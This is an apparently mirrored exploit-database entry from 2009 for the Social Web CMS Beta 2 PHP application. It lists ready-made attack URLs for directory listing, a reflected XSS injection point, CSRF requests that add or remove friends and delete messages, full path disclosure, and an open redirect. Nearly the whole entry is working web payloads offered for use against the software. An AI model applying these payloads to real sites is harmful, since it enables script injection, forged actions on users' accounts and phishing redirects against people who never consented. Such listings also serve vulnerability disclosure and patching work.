[] NeoSense
E X P L O I T S
title author type platform port cve id

social Web CMS Beta 2 - Multiple Vulnerabilities

Author: cp77fk4r
type: webapps
platform: php
port: 
date_added: 2009-12-20 
date_updated:  
verified: 1 
codes: OSVDB-61239;OSVDB-61238 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.com1_SocialWebCMS_B2_RC1.zip
# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<http://gmail.com/>
# Software Link: http://www.socialwebcms.com
# Version: X <= Beta 2
#
# Vulnz:
#
#[Directory Listing]
http://server/modules/
#
#
#[XSS]
http://server/index.php?category=%22%3E[XSS]
#
#
#[CSRF]
-Add friends:
 http://server/user/view/addfriend/login/[VALID_FRIEND]
 or
 http://server/user.php?login=[VALID_FRIEND]&view=addfriend
#
-Remove friends:
 http://server]/user/view/removefriend/login/[VALID_FRIEND]
 or
 http://server/user.php?login=[VALID_FRIEND]&view=removefriend
#
-Remove Messages:
 http://server/module.php?module=simple_messaging&view=delmsg&msg_id=[MESSAGE_ID]
#
#
#[Full Path Disclosure] (From Unlogged Browsing)
http://server/module.php?module=simple_messaging&view=delmsg&msg_id=
#
#[User Redirection]
http://server/module.php?module=simple_messaging&view=compose&to=[VALID_FRIEND]&return=[URL]
#
# EOF
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.